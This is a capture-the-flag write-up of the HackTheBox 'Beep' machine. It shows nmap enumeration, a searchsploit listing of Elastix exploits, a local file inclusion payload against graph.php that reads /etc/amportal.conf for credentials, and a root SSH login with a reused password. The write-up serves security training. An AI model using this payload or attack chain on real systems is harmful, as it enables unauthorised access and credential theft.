HackTheBox - Beep

---

Description

Hello hackers, I hope you are doing well. We are doing Beep from HackTheBox.

Enumeration

nmap

We start a nmap scan using the following command: sudo nmap -sC -sV -T4 {target_IP}.

• -sC: run all the default scripts.

• -sV: Find the version of services running on the target.

• -T4: Aggressive scan to provide faster results.

Nmap scan report for 10.10.10.7       
Host is up (0.40s latency).
Not shown: 988 closed tcp ports (reset) 
PORT      STATE SERVICE    VERSION    
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:                        
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd                    
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3                    
|_http-title: Did not follow redirect to https://10.10.10.7/
|_http-server-header: Apache/2.2.3 (CentOS)    
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: PIPELINING EXPIRE(NEVER) STLS APOP LOGIN-DELAY(0) RESP-CODES UIDL USER TOP IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)        
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind    2 (RPC #100000)                              
| rpcinfo:                                                                    
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status                                                                                                                    
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: Completed X-NETSCAPE RIGHTS=kxte THREAD=REFERENCES NAMESPACE ACL LISTEXT RENAME IMAP4 LIST-SUBSCRIBED MAILBOX-REFERRALS CHILDREN STARTTL
S URLAUTHA0001 THREAD=ORDEREDSUBJECT LITERAL+ IDLE MULTIAPPEND NO UIDPLUS ANNOTATEMORE ATOMIC OK SORT=MODSEQ UNSELECT ID BINARY CONDSTORE CATENATE QUOTA SORT
 IMAP4rev1
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2022-08-19T08:56:58+00:00; -29m44s from scanner time.
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Elastix - Login page
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Nmap found quite a lot of services, but let’s start with the webserver on port 80/443.

Web

Navigating to the webserver we find the following.

We found a login page for elastix, i tried some default credentials but lo luck login in.

Let’s see if there is any exploits for this service.

$ searchsploit elastix
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                      | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                    | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                              | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                           | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                          | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                         | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                     | php/webapps/18650.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We found a bunch of exploits, but let’s try the local file inclusion one.

We can copy it with the following command.

$ searchsploit -m php/webapps/37637.pl
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
File Type: ASCII text

Copied to: /home/sirius/CTF/HTB/Machines/beep/37637.pl

Reading through the exploit, we found the following proof of concept.

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Let’s try it.

It worked, for a better view, press ctrl + u.

We found some passwords, wait! It’s the same password being reused.

Foothold

Let’s try login as root with the password we found via ssh.

$ ssh root@10.10.10.7                                                                                
root@10.10.10.7's password: 
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# 

---

Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).